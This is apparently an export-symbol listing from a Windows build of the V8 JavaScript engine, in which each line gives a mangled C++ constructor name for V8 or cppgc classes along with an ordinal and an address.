                                                                                                                                                                                                        ??0CompilationDependencies@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVZone@23@@Z4510x140f334c0
                                                                                                                                                                                                        ??0CompilationJob@internal@v8@@QEAA@AEBV012@@Z4520x14047c0e0
                                                                                                                                                                                                        ??0CompilationJob@internal@v8@@QEAA@W4State@012@@Z4530x14047c100
                                                                                                                                                                                                        ??0CompilationResultResolver@wasm@internal@v8@@QEAA@AEBV0123@@Z4540x14007a080
                                                                                                                                                                                                        ??0CompilationResultResolver@wasm@internal@v8@@QEAA@XZ4550x14007a080
                                                                                                                                                                                                        ??0CompiledWasmModule@v8@@AEAA@V?$shared_ptr@VNativeModule@wasm@internal@v8@@@std@@PEBD_K@Z4560x140b06510
                                                                                                                                                                                                        ??0CompiledWasmModule@v8@@QEAA@$$QEAV01@@Z4570x1400794f0
                                                                                                                                                                                                        ??0CompiledWasmModule@v8@@QEAA@AEBV01@@Z4580x1400794f0
                                                                                                                                                                                                        ??0ConcurrentMarker@internal@cppgc@@QEAA@AEAVHeapBase@12@AEAVMarkingWorklists@12@AEAVIncrementalMarkingSchedule@12@PEAVPlatform@2@@Z4590x14044f4c0
                                                                                                                                                                                                        ??0ConcurrentMarkerBase@internal@cppgc@@QEAA@AEAVHeapBase@12@AEAVMarkingWorklists@12@AEAVIncrementalMarkingSchedule@12@PEAVPlatform@2@@Z4600x140467cc0
                                                                                                                                                                                                        ??0ConcurrentMarking@internal@v8@@QEAA@PEAVHeap@12@PEAVMarkingWorklists@12@PEAVWeakObjects@12@@Z4610x1409ec5e0
                                                                                                                                                                                                        ??0ConcurrentMarkingVisitor@internal@cppgc@@QEAA@AEAVHeapBase@12@AEAVConcurrentMarkingState@12@@Z4620x14045a150
                                                                                                                                                                                                        ??0ConcurrentUnifiedHeapMarkingVisitor@internal@v8@@QEAA@AEAVHeapBase@1cppgc@@AEAVConcurrentMarkingState@14@AEAVUnifiedHeapMarkingState@12@@Z4630x1409e6620
                                                                                                                                                                                                        ??0ConcurrentUnifiedHeapMarkingVisitor@internal@v8@@QEAA@AEBV012@@Z4640x1409e6640
                                                                                                                                                                                                        ??0ConditionVariable@base@v8@@QEAA@XZ4650x140e63680
                                                                                                                                                                                                        ??0ConditionalControlFlowBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVAstNode@23@@Z4660x1408f2860
                                                                                                                                                                                                        ??0Constant@compiler@internal@v8@@QEAA@H@Z4670x140ea3990
                                                                                                                                                                                                        ??0Constant@compiler@internal@v8@@QEAA@M@Z4680x1404ba450
                                                                                                                                                                                                        ??0Constant@compiler@internal@v8@@QEAA@N@Z4690x1404ba470
                                                                                                                                                                                                        ??0Constant@compiler@internal@v8@@QEAA@PEBVStringConstantBase@23@@Z4700x1404ba490
                                                                                                                                                                                                        ??0Constant@compiler@internal@v8@@QEAA@V?$Handle@VHeapObject@internal@v8@@@23@_N@Z4710x1404ba4b0
                                                                                                                                                                                                        ??0Constant@compiler@internal@v8@@QEAA@VExternalReference@23@@Z4720x1404ba4d0
                                                                                                                                                                                                        ??0Constant@compiler@internal@v8@@QEAA@VRelocatablePtrConstantInfo@123@@Z4730x140ea39b0
                                                                                                                                                                                                        ??0Constant@compiler@internal@v8@@QEAA@VRpoNumber@123@@Z4740x1404ba4f0
                                                                                                                                                                                                        ??0Constant@compiler@internal@v8@@QEAA@_J@Z4750x1404ba510
                                                                                                                                                                                                        ??0ConstantArrayBuilder@interpreter@internal@v8@@QEAA@$$QEAV0123@@Z4760x1408f05e0
                                                                                                                                                                                                        ??0ConstantArrayBuilder@interpreter@internal@v8@@QEAA@PEAVZone@23@@Z4770x1408f4c50
                                                                                                                                                                                                        ??0ConstantFoldingReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z4780x140fa0460
                                                                                                                                                                                                        ??0Contents@ArrayBuffer@v8@@AEAA@PEAX_K01W4AllocationMode@Allocator@12@P6AX010@Z0@Z4790x140b065d0
                                                                                                                                                                                                        ??0Contents@ArrayBuffer@v8@@QEAA@XZ4800x140078d00
                                                                                                                                                                                                        ??0Contents@SharedArrayBuffer@v8@@AEAA@PEAX_K01W4AllocationMode@Allocator@ArrayBuffer@2@P6AX010@Z0@Z4810x140b065d0
                                                                                                                                                                                                        ??0Contents@SharedArrayBuffer@v8@@QEAA@XZ4820x140078d00
                                                                                                                                                                                                        ??0ContextDeserializer@internal@v8@@AEAA@PEAVIsolate@12@PEBVSnapshotData@12@_N@Z4830x1406c1bc0
                                                                                                                                                                                                        ??0ContextSerializer@internal@v8@@QEAA@PEAVIsolate@12@V?$Flags@W4SerializerFlag@Snapshot@internal@v8@@H@base@2@PEAVStartupSerializer@12@USerializeInternalFieldsCallback@2@@Z4840x1406d9020
                                                                                                                                                                                                        ??0ControlEquivalence@compiler@internal@v8@@QEAA@$$QEAV0123@@Z4850x14104eb00
                                                                                                                                                                                                        ??0ControlEquivalence@compiler@internal@v8@@QEAA@AEBV0123@@Z4860x14104eb60
                                                                                                                                                                                                        ??0ControlEquivalence@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVGraph@123@@Z4870x14104ec40
                                                                                                                                                                                                        ??0ControlFlowBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@@Z4880x1408f29c0
                                                                                                                                                                                                        ??0ControlFlowOptimizer@compiler@internal@v8@@QEAA@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVMachineOperatorBuilder@123@PEAVTickCounter@23@PEAVZone@23@@Z4890x140fa08e0
                                                                                                                                                                                                        ??0Counters@V8Inspector@v8_inspector@@QEAA@AEBV012@@Z4900x14042ddf0
                                                                                                                                                                                                        ??0Counters@V8Inspector@v8_inspector@@QEAA@PEAVIsolate@v8@@@Z4910x140672180
                                                                                                                                                                                                        ??0Coverage@debug@v8@@AEAA@V?$shared_ptr@VCoverage@internal@v8@@@std@@@Z4920x14042dd80
                                                                                                                                                                                                        ??0Coverage@debug@v8@@QEAA@$$QEAV012@@Z4930x14042dd80
                                                                                                                                                                                                        ??0CppHeap@internal@v8@@QEAA@PEAVPlatform@2@AEBV?$vector@V?$unique_ptr@VCustomSpaceBase@cppgc@@U?$default_delete@VCustomSpaceBase@cppgc@@@std@@@std@@V?$allocator@V?$unique_ptr@VCustomSpaceBase@cppgc@@U?$default_delete@VCustomSpaceBase@cppgc@@@std@@@std@@@2@@std@@AEBUWrapperDescriptor@2@@Z4940x1409e8890
                                                                                                                                                                                                        ??0CppHeap@v8@@AEAA@XZ4950x14042dde0
                                                                                                                                                                                                        ??0CppHeap@v8@@QEAA@AEBV01@@Z4960x14042dde0
                                                                                                                                                                                                        ??0CpuFeatureScope@internal@v8@@QEAA@PEAVAssemblerBase@12@W4CpuFeature@12@W4CheckPolicy@012@@Z4970x140078ac0
                                                                                                                                                                                                        ??0CpuProfile@internal@v8@@QEAA@PEAVCpuProfiler@12@PEBDVCpuProfilingOptions@2@V?$unique_ptr@VDiscardedSamplesDelegate@v8@@U?$default_delete@VDiscardedSamplesDelegate@v8@@@std@@@std@@@Z4980x14074cc90
                                                                                                                                                                                                        ??0CpuProfileDeoptInfo@v8@@QEAA@$$QEAU01@@Z4990x140079ec0
                                                                                                                                                                                                        ??0CpuProfileDeoptInfo@v8@@QEAA@AEBU01@@Z5000x140079e30
                                                                                                                                                                                                        ??0CpuProfileDeoptInfo@v8@@QEAA@XZ5010x140079db0
                                                                                                                                                                                                        ??0CpuProfiler@internal@v8@@QEAA@PEAVIsolate@12@W4CpuProfilingNamingMode@2@W4CpuProfilingLoggingMode@2@@Z5020x140760350
                                                                                                                                                                                                        ??0CpuProfiler@internal@v8@@QEAA@PEAVIsolate@12@W4CpuProfilingNamingMode@2@W4CpuProfilingLoggingMode@2@PEAVCpuProfilesCollection@12@PEAVSymbolizer@12@PEAVProfilerEventsProcessor@12@PEAVProfilerCodeObserver@12@@Z5030x140760430
                                                                                                                                                                                                        ??0CpuProfilesCollection@internal@v8@@QEAA@PEAVIsolate@12@@Z5040x14074cee0
                                                                                                                                                                                                        ??0CpuProfilingOptions@v8@@QEAA@W4CpuProfilingMode@1@IHV?$MaybeLocal@VContext@v8@@@1@@Z5050x140b06610
                                                                                                                                                                                                        ??0CreateParams@Isolate@v8@@QEAA@AEBU012@@Z5060x140079b30
                                                                                                                                                                                                        ??0CreateParams@Isolate@v8@@QEAA@XZ5070x140b06620
                                                                                                                                                                                                        ??0CrossThreadPersistentRegion@internal@cppgc@@QEAA@XZ5080x14044f4f0
                                                                                                                                                                                                        ??0CsaLoadElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVZone@23@@Z5090x140f098b0
                                                                                                                                                                                                        ??0DateCache@internal@v8@@QEAA@AEBV012@@Z5100x1407057b0
                                                                                                                                                                                                        ??0DateCache@internal@v8@@QEAA@XZ5110x140a79220
                                                                                                                                                                                                        ??0DbgStreamBuf@internal@v8@@QEAA@AEBV012@@Z5120x14047c140
                                                                                                                                                                                                        ??0DbgStreamBuf@internal@v8@@QEAA@XZ5130x1406b3920
                                                                                                                                                                                                        ??0DeadCodeElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVZone@23@@Z5140x140fac6a0
                                                                                                                                                                                                        ??0Debug@internal@v8@@AEAA@PEAVIsolate@12@@Z5150x140a5c730
                                                                                                                                                                                                        ??0DebugInfo@wasm@internal@v8@@QEAA@PEAVNativeModule@123@@Z5160x14055e680
                                                                                                                                                                                                        ??0DeclarationScope@internal@v8@@QEAA@$$QEAV012@@Z5170x1406ea580
                                                                                                                                                                                                        ??0DeclarationScope@internal@v8@@QEAA@PEAVZone@12@PEAVAstValueFactory@12@W4REPLMode@12@@Z5180x140af1a20
                                                                                                                                                                                                        ??0DeclarationScope@internal@v8@@QEAA@PEAVZone@12@PEAVScope@12@W4ScopeType@12@W4FunctionKind@12@@Z5190x140af1b30
                                                                                                                                                                                                        ??0DeclarationScope@internal@v8@@QEAA@PEAVZone@12@W4ScopeType@12@PEAVAstValueFactory@12@V?$Handle@VScopeInfo@internal@v8@@@12@@Z5200x140af1bd0
                                                                                                                                                                                                        ??0DefaultEmbedderRootsHandler@internal@v8@@QEAA@$$QEAV012@@Z5210x140952110
                                                                                                                                                                                                        ??0DefaultEmbedderRootsHandler@internal@v8@@QEAA@AEBV012@@Z5220x140952110
                                                                                                                                                                                                        ??0DefaultEmbedderRootsHandler@internal@v8@@QEAA@XZ5230x140952130
                                                                                                                                                                                                        ??0DefaultPlatform@cppgc@@QEAA@$$QEAV01@@Z5240x140467400
                                                                                                                                                                                                        ??0DefaultPlatform@cppgc@@QEAA@HW4IdleTaskSupport@platform@v8@@V?$unique_ptr@VTracingController@v8@@U?$default_delete@VTracingController@v8@@@std@@@std@@@Z5250x140467420
                                                                                                                                                                                                        ??0Delegate@ValueDeserializer@v8@@QEAA@AEBV012@@Z5260x1400793c0
                                                                                                                                                                                                        ??0Delegate@ValueDeserializer@v8@@QEAA@XZ5270x1400793c0
                                                                                                                                                                                                        ??0Delegate@ValueSerializer@v8@@QEAA@AEBV012@@Z5280x1400793b0
                                                                                                                                                                                                        ??0Delegate@ValueSerializer@v8@@QEAA@XZ5290x1400793b0
                                                                                                                                                                                                        ??0Descriptor@internal@v8@@IEAA@V?$Handle@VName@internal@v8@@@12@AEBVMaybeObjectHandle@12@VPropertyDetails@12@@Z5300x1407ddc50
                                                                                                                                                                                                        ??0Descriptor@internal@v8@@IEAA@V?$Handle@VName@internal@v8@@@12@AEBVMaybeObjectHandle@12@W4PropertyKind@12@W4PropertyAttributes@12@W4PropertyLocation@12@W4PropertyConstness@12@VRepresentation@12@H@Z5310x1407ddc70
                                                                                                                                                                                                        ??0Descriptor@internal@v8@@QEAA@XZ5320x1407ddcb0
                                                                                                                                                                                                        ??0DetachableVectorBase@internal@v8@@QEAA@XZ5330x14007b730
                                                                                                                                                                                                        ??0DiamondMatcher@compiler@internal@v8@@QEAA@PEAVNode@123@@Z5340x141099180
                                                                                                                                                                                                        ??0DisallowCompilation@internal@v8@@QEAA@PEAVIsolate@12@@Z5350x140a7d7e0
                                                                                                                                                                                                        ??0DisallowDeoptimization@internal@v8@@QEAA@PEAVIsolate@12@@Z5360x140a7d800
                                                                                                                                                                                                        ??0DisallowExceptions@internal@v8@@QEAA@PEAVIsolate@12@@Z5370x140a7d820
                                                                                                                                                                                                        ??0DisallowGarbageCollectionScope@subtle@cppgc@@QEAA@AEAVHeapHandle@2@@Z5380x140464fb0
                                                                                                                                                                                                        ??0DisallowJavascriptExecution@internal@v8@@QEAA@PEAVIsolate@12@@Z5390x140a7d840
                                                                                                                                                                                                        ??0DisallowJavascriptExecutionScope@Isolate@v8@@QEAA@PEAV12@W4OnFailure@012@@Z5400x140b06690
                                                                                                                                                                                                        ??0DiscardedSamplesDelegate@v8@@QEAA@AEBV01@@Z5410x140079fd0
                                                                                                                                                                                                        ??0DiscardedSamplesDelegate@v8@@QEAA@XZ5420x140079fd0
                                                                                                                                                                                                        ??0DisjointAllocationPool@wasm@internal@v8@@QEAA@$$QEAV0123@@Z5430x14047c1e0
                                                                                                                                                                                                        ??0DisjointAllocationPool@wasm@internal@v8@@QEAA@VAddressRegion@base@3@@Z5440x14047c240
                                                                                                                                                                                                        ??0DisjointAllocationPool@wasm@internal@v8@@QEAA@XZ5450x140458470
                                                                                                                                                                                                        ??0Domain@API@Schema@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z5460x14042dea0
                                                                                                                                                                                                        ??0Domain@API@Schema@protocol@v8_inspector@@QEAA@AEBV01234@@Z5470x14042dea0
                                                                                                                                                                                                        ??0Domain@API@Schema@protocol@v8_inspector@@QEAA@XZ5480x14042dea0
                                                                                                                                                                                                        ??0DumpOnJavascriptExecution@internal@v8@@QEAA@PEAVIsolate@12@@Z5490x140a7d860
                                                                                                                                                                                                        ??0EhFrameIterator@internal@v8@@QEAA@PEBE0@Z5500x1400bb830
                                                                                                                                                                                                        ??0EhFrameWriter@internal@v8@@QEAA@PEAVZone@12@@Z5510x140a40580
                                                                                                                                                                                                        ??0EmbedderGraph@v8@@QEAA@AEBV01@@Z5520x14007a090
                                                                                                                                                                                                        ??0EmbedderGraph@v8@@QEAA@XZ5530x14007a090
                                                                                                                                                                                                        ??0EmbedderHeapTracer@v8@@QEAA@AEBV01@@Z5540x140079af0
                                                                                                                                                                                                        ??0EmbedderHeapTracer@v8@@QEAA@XZ5550x140079ad0
                                                                                                                                                                                                        ??0EmbedderRootsHandler@v8@@QEAA@AEBV01@@Z5560x140079ab0
                                                                                                                                                                                                        ??0EmbedderRootsHandler@v8@@QEAA@XZ5570x140079ab0
                                                                                                                                                                                                        ??0EmbedderStackStateScope@internal@v8@@QEAA@PEAVLocalEmbedderHeapTracer@12@W4EmbedderStackState@cppgc@@@Z5580x140952150
                                                                                                                                                                                                        ??0EnabledCheckingPolicy@internal@cppgc@@QEAA@XZ5590x1400fba60
                                                                                                                                                                                                        ??0Entry@TypeProfile@debug@v8@@AEAA@PEBUTypeProfileEntry@internal@3@V?$shared_ptr@VTypeProfile@internal@v8@@@std@@@Z5600x14047bd70
                                                                                                                                                                                                        ??0Entry@TypeProfile@debug@v8@@QEAA@$$QEAV0123@@Z5610x14047bda0
                                                                                                                                                                                                        ??0EphemeronHashTable@internal@v8@@IEAA@_K@Z5620x140078b40
                                                                                                                                                                                                        ??0EphemeronHashTable@internal@v8@@QEAA@XZ5630x1400fba60
                                                                                                                                                                                                        ??0ErrorThrower@wasm@internal@v8@@QEAA@$$QEAV0123@@Z5640x14052b1d0
                                                                                                                                                                                                        ??0ErrorThrower@wasm@internal@v8@@QEAA@PEAVIsolate@23@PEBD@Z5650x140523620
                                                                                                                                                                                                        ??0EscapableHandleScope@v8@@QEAA@PEAVIsolate@1@@Z5660x140b06700
                                                                                                                                                                                                        ??0EscapeAnalysis@compiler@internal@v8@@QEAA@PEAVJSGraph@123@PEAVTickCounter@23@PEAVZone@23@@Z5670x140fce6d0
                                                                                                                                                                                                        ??0EscapeAnalysisReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@VEscapeAnalysisResult@123@PEAVZone@23@@Z5680x140fd36d0
                                                                                                                                                                                                        ??0Event@StatsCollector@internal@cppgc@@QEAA@XZ5690x1404556f0
                                                                                                                                                                                                        ??0Exported@protocol@v8_inspector@@QEAA@AEBV012@@Z5700x14042dea0
                                                                                                                                                                                                        ??0Exported@protocol@v8_inspector@@QEAA@XZ5710x14042dea0
                                                                                                                                                                                                        ??0Extension@v8@@QEAA@PEBD0HPEAPEBDH@Z5720x140b06770
                                                                                                                                                                                                        ??0ExtensionConfiguration@v8@@QEAA@HQEAPEBD@Z5730x140078f70
                                                                                                                                                                                                        ??0ExtensionConfiguration@v8@@QEAA@XZ5740x140078f60
                                                                                                                                                                                                        ??0ExternalMarkingWorklist@MarkingWorklists@internal@cppgc@@QEAA@XZ5750x14044f510
                                                                                                                                                                                                        ??0ExternalOneByteStringResource@String@v8@@IEAA@XZ5760x1400793e0
                                                                                                                                                                                                        ??0ExternalPointerTable@internal@v8@@QEAA@XZ5770x14047c350
                                                                                                                                                                                                        ??0ExternalResourceVisitor@v8@@QEAA@AEBV01@@Z5780x140079aa0
                                                                                                                                                                                                        ??0ExternalResourceVisitor@v8@@QEAA@XZ5790x140079aa0
                                                                                                                                                                                                        ??0ExternalSourceStream@ScriptCompiler@v8@@QEAA@AEBV012@@Z5800x140078b50
                                                                                                                                                                                                        ??0ExternalSourceStream@ScriptCompiler@v8@@QEAA@XZ5810x140078b50
                                                                                                                                                                                                        ??0ExternalStringResource@String@v8@@IEAA@XZ5820x1400793e0
                                                                                                                                                                                                        ??0ExternalStringResourceBase@String@v8@@IEAA@XZ5830x1400793d0
                                                                                                                                                                                                        ??0FeedbackIterator@internal@v8@@QEAA@PEBVFeedbackNexus@12@@Z5840x140878870
                                                                                                                                                                                                        ??0FeedbackNexus@internal@v8@@QEAA@V?$Handle@VFeedbackVector@internal@v8@@@12@VFeedbackSlot@12@@Z5850x1408789e0
                                                                                                                                                                                                        ??0FeedbackNexus@internal@v8@@QEAA@V?$Handle@VFeedbackVector@internal@v8@@@12@VFeedbackSlot@12@AEBVNexusConfig@12@@Z5860x140878a70
                                                                                                                                                                                                        ??0FeedbackNexus@internal@v8@@QEAA@VFeedbackVector@12@VFeedbackSlot@12@@Z5870x140878ae0
                                                                                                                                                                                                        ??0FeedbackSource@compiler@internal@v8@@QEAA@V?$Handle@VFeedbackVector@internal@v8@@@23@VFeedbackSlot@23@@Z5880x1404ba550
                                                                                                                                                                                                        ??0FeedbackVectorSpec@internal@v8@@QEAA@$$QEAV012@@Z5890x14047c390
                                                                                                                                                                                                        ??0FeedbackVectorSpec@internal@v8@@QEAA@AEBV012@@Z5900x14047c3d0
                                                                                                                                                                                                        ??0FeedbackVectorSpec@internal@v8@@QEAA@PEAVZone@12@@Z5910x14047c4a0
                                                                                                                                                                                                        ??0FlatStringReader@internal@v8@@QEAA@$$QEAV012@@Z5920x14047c550
                                                                                                                                                                                                        ??0FlatStringReader@internal@v8@@QEAA@AEBV012@@Z5930x14047c550
                                                                                                                                                                                                        ??0FlatStringReader@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VString@internal@v8@@@12@@Z5940x1407c3470
                                                                                                                                                                                                        ??0Frame@compiler@internal@v8@@QEAA@H@Z5950x140ee3070
                                                                                                                                                                                                        ??0FrameSummary@internal@v8@@QEAA@VJavaScriptFrameSummary@012@@Z5960x14049b040
                                                                                                                                                                                                        ??0FrameSummary@internal@v8@@QEAA@VWasmFrameSummary@012@@Z5970x14049b070
                                                                                                                                                                                                        ??0FreeList@internal@cppgc@@QEAA@$$QEAV012@@Z5980x140466810
                                                                                                                                                                                                        ??0FreeList@internal@cppgc@@QEAA@XZ5990x140466910
                                                                                                                                                                                                        ??0FreeListMany@internal@v8@@QEAA@XZ6000x1409cc740
                                                                                                                                                                                                        ??0FreeListManyCached@internal@v8@@QEAA@XZ6010x1409cc7d0
                                                                                                                                                                                                        ??0FreeListManyCachedFastPath@internal@v8@@QEAA@XZ6020x14047c5a0
                                                                                                                                                                                                        ??0FreeListManyCachedOrigin@internal@v8@@QEAA@XZ6030x14047c5d0
                                                                                                                                                                                                        ??0FunctionData@Coverage@debug@v8@@AEAA@PEAUCoverageFunction@internal@3@V?$shared_ptr@VCoverage@internal@v8@@@std@@@Z6040x14047bd70
                                                                                                                                                                                                        ??0FunctionData@Coverage@debug@v8@@QEAA@$$QEAV0123@@Z6050x14047bda0
                                                                                                                                                                                                        ??0GCInfoTable@internal@cppgc@@QEAA@PEAVPageAllocator@v8@@@Z6060x140466330
                                                                                                                                                                                                        ??0GCInvoker@internal@cppgc@@QEAA@PEAVGarbageCollector@12@PEAVPlatform@2@W4StackSupport@Heap@2@@Z6070x140465b90
                                                                                                                                                                                                        ??0GCTracer@internal@v8@@QEAA@PEAVHeap@12@@Z6080x1409c7610
                                                                                                                                                                                                        ??0GlobalDictionary@internal@v8@@IEAA@_K@Z6090x140078b40
                                                                                                                                                                                                        ??0GlobalDictionary@internal@v8@@QEAA@XZ6100x1400fba60
                                                                                                                                                                                                        ??0GlobalHandles@internal@v8@@QEAA@PEAVIsolate@12@@Z6110x1409f50a0
                                                                                                                                                                                                        ??0Graph@compiler@internal@v8@@QEAA@PEAVZone@23@@Z6120x140f54350
                                                                                                                                                                                                        ??0GraphAssembler@compiler@internal@v8@@QEAA@PEAVMachineGraph@123@PEAVZone@23@V?$Optional@V?$function@$$A6AXPEAVNode@compiler@internal@v8@@@Z@std@@@base@3@PEAVSchedule@123@_N@Z6130x140f58430
                                                                                                                                                                                                        ??0GraphReducer@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVGraph@123@PEAVTickCounter@23@PEAVJSHeapBroker@123@PEAVNode@123@PEAVObserveNodeManager@123@@Z6140x140f36d30
                                                                                                                                                                                                        ??0GraphTrimmer@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVGraph@123@@Z6150x140fd5dd0
                                                                                                                                                                                                        ??0HandleScope@v8@@QEAA@PEAVIsolate@1@@Z6160x140b06830
                                                                                                                                                                                                        ??0HandlerTable@internal@v8@@QEAA@PEBVWasmCode@wasm@12@@Z6170x140a9f3a0
                                                                                                                                                                                                        ??0HandlerTable@internal@v8@@QEAA@VByteArray@12@@Z6180x140a9f400
                                                                                                                                                                                                        ??0HandlerTable@internal@v8@@QEAA@VBytecodeArray@12@@Z6190x140a9f430
                                                                                                                                                                                                        ??0HandlerTable@internal@v8@@QEAA@VCode@12@@Z6200x140a9f460
                                                                                                                                                                                                        ??0HandlerTable@internal@v8@@QEAA@_KHW4EncodingMode@012@@Z6210x140a9f4b0
                                                                                                                                                                                                        ??0HandlerTableBuilder@interpreter@internal@v8@@QEAA@PEAVZone@23@@Z6220x1404b9c40
                                                                                                                                                                                                        ??0HashTableBase@internal@v8@@IEAA@_K@Z6230x140078b40
                                                                                                                                                                                                        ??0HashTableBase@internal@v8@@QEAA@XZ6240x1400fba60
                                                                                                                                                                                                        ??0Heap@cppgc@@AEAA@XZ6250x14042dde0
                                                                                                                                                                                                        ??0Heap@cppgc@@QEAA@AEBV01@@Z6260x14042dde0
                                                                                                                                                                                                        ??0Heap@internal@cppgc@@QEAA@V?$shared_ptr@VPlatform@cppgc@@@std@@UHeapOptions@02@@Z6270x140461c50
                                                                                                                                                                                                        ??0HeapBase@internal@cppgc@@QEAA@V?$shared_ptr@VPlatform@cppgc@@@std@@AEBV?$vector@V?$unique_ptr@VCustomSpaceBase@cppgc@@U?$default_delete@VCustomSpaceBase@cppgc@@@std@@@std@@V?$allocator@V?$unique_ptr@VCustomSpaceBase@cppgc@@U?$default_delete@VCustomSpaceBase@cppgc@@@std@@@std@@@2@@4@W4StackSupport@Heap@2@@Z6280x1404650d0
                                                                                                                                                                                                        ??0HeapCodeStatistics@v8@@QEAA@XZ6290x14007b730
                                                                                                                                                                                                        ??0HeapConstantType@compiler@internal@v8@@AEAA@IAEBVHeapObjectRef@123@@Z6300x140e9f8d0
                                                                                                                                                                                                        ??0HeapGrowing@internal@cppgc@@QEAA@PEAVGarbageCollector@12@PEAVStatsCollector@12@UResourceConstraints@Heap@2@W4MarkingType@62@W4SweepingType@62@@Z6310x140464b90
                                                                                                                                                                                                        ??0HeapObjectIterator@internal@v8@@QEAA@PEAVHeap@12@W4HeapObjectsFiltering@012@@Z6320x1409adb10
                                                                                                                                                                                                        ??0HeapObjectStatistics@v8@@QEAA@XZ6330x140b06850
                                                                                                                                                                                                        ??0HeapSpaceStatistics@v8@@QEAA@XZ6340x14044f4f0
                                                                                                                                                                                                        ??0HeapStatistics@v8@@QEAA@XZ6350x140b06870
                                                                                                                                                                                                        ??0HiddenLocalFactory@internal@v8@@QEAA@PEAVIsolate@12@@Z6360x14047c600
                                                                                                                                                                                                        ??0I32PairToBigIntDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z6370x1404b9be0
                                                                                                                                                                                                        ??0I32PairToBigIntDescriptor@internal@v8@@QEAA@XZ6380x1404ba530
                                                                                                                                                                                                        ??0I64ToBigIntDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z6390x1404b9be0
                                                                                                                                                                                                        ??0I64ToBigIntDescriptor@internal@v8@@QEAA@XZ6400x1404ba540
                                                                                                                                                                                                        ??0IdentityMapBase@internal@v8@@IEAA@PEAVHeap@12@@Z6410x1404e2f80
                                                                                                                                                                                                        ??0IncrementalMarking@internal@v8@@QEAA@PEAVHeap@12@PEAVWeakObjects@12@@Z6420x1409a6550
                                                                                                                                                                                                        ??0IncrementalMarkingSchedule@internal@cppgc@@QEAA@XZ6430x14044f590
                                                                                                                                                                                                        ??0IndexGenerator@internal@v8@@QEAA@_K@Z6440x1409a5dc0
                                                                                                                                                                                                        ??0IndirectFunctionTableEntry@internal@v8@@QEAA@V?$Handle@VWasmIndirectFunctionTable@internal@v8@@@12@H@Z6450x14047c620
                                                                                                                                                                                                        ??0IndirectFunctionTableEntry@internal@v8@@QEAA@V?$Handle@VWasmInstanceObject@internal@v8@@@12@HH@Z6460x14047c640
                                                                                                                                                                                                        ??0Inputs@Node@compiler@internal@v8@@QEAA@PEBQEAV1234@H@Z6470x1404ba550
                                                                                                                                                                                                        ??0Inspectable@V8InspectorSession@v8_inspector@@QEAA@AEBV012@@Z6480x14042deb0
                                                                                                                                                                                                        ??0Inspectable@V8InspectorSession@v8_inspector@@QEAA@XZ6490x14042deb0
                                                                                                                                                                                                        ??0InstantiationResultResolver@wasm@internal@v8@@QEAA@AEBV0123@@Z6500x14007a080
                                                                                                                                                                                                        ??0InstantiationResultResolver@wasm@internal@v8@@QEAA@XZ6510x14007a080
                                                                                                                                                                                                        ??0Instruction@compiler@internal@v8@@AEAA@I@Z6520x140ea3bb0
                                                                                                                                                                                                        ??0Instruction@compiler@internal@v8@@AEAA@I_KPEAVInstructionOperand@123@0101@Z6530x140ea3bd0
                                                                                                                                                                                                        ??0InstructionBlock@compiler@internal@v8@@QEAA@$$QEAV0123@@Z6540x1404ba560
                                                                                                                                                                                                        ??0InstructionBlock@compiler@internal@v8@@QEAA@AEBV0123@@Z6550x1404ba6b0
                                                                                                                                                                                                        ??0InstructionBlock@compiler@internal@v8@@QEAA@PEAVZone@23@VRpoNumber@123@111_N2@Z6560x140ea3cb0
                                                                                                                                                                                                        ??0InstructionOperand@compiler@internal@v8@@IEAA@W4Kind@0123@@Z6570x1404ba830
                                                                                                                                                                                                        ??0InstructionOperand@compiler@internal@v8@@QEAA@XZ6580x1400fba60
                                                                                                                                                                                                        ??0InstructionScheduler@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVInstructionSequence@123@@Z6590x140f53310
                                                                                                                                                                                                        ??0InstructionSelector@compiler@internal@v8@@QEAA@$$QEAV0123@@Z6600x1404c0cb0
                                                                                                                                                                                                        ??0InstructionSelector@compiler@internal@v8@@QEAA@AEBV0123@@Z6610x1404c1240
                                                                                                                                                                                                        ??0InstructionSelector@compiler@internal@v8@@QEAA@PEAVZone@23@_KPEAVLinkage@123@PEAVInstructionSequence@123@PEAVSchedule@123@PEAVSourcePositionTable@123@PEAVFrame@123@W4EnableSwitchJumpTable@0123@PEAVTickCounter@23@PEAVJSHeapBroker@123@PEA_KPEA_KW4SourcePositionMode@0123@VFeatures@0123@W4EnableScheduling@0123@W4EnableRootsRelativeAddressing@0123@W4PoisoningMitigationLevel@23@W4EnableTraceTurboJson@0123@@Z6620x140ed2cc0
                                                                                                                                                                                                        ??0InstructionSequence@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVZone@23@PEAV?$ZoneVector@PEAVInstructionBlock@compiler@internal@v8@@@23@@Z6630x140ea3d30
                                                                                                                                                                                                        ??0Int64Lowering@compiler@internal@v8@@QEAA@PEAVGraph@123@PEAVMachineOperatorBuilder@123@PEAVCommonOperatorBuilder@123@PEAVSimplifiedOperatorBuilder@123@PEAVZone@23@PEAV?$Signature@W4MachineRepresentation@internal@v8@@@23@V?$unique_ptr@UInt64LoweringSpecialCase@compiler@internal@v8@@U?$default_delete@UInt64LoweringSpecialCase@compiler@internal@v8@@@std@@@std@@@Z6640x140f68430
                                                                                                                                                                                                        ??0Int64LoweringSpecialCase@compiler@internal@v8@@QEAA@$$QEAU0123@@Z6650x14047cd10
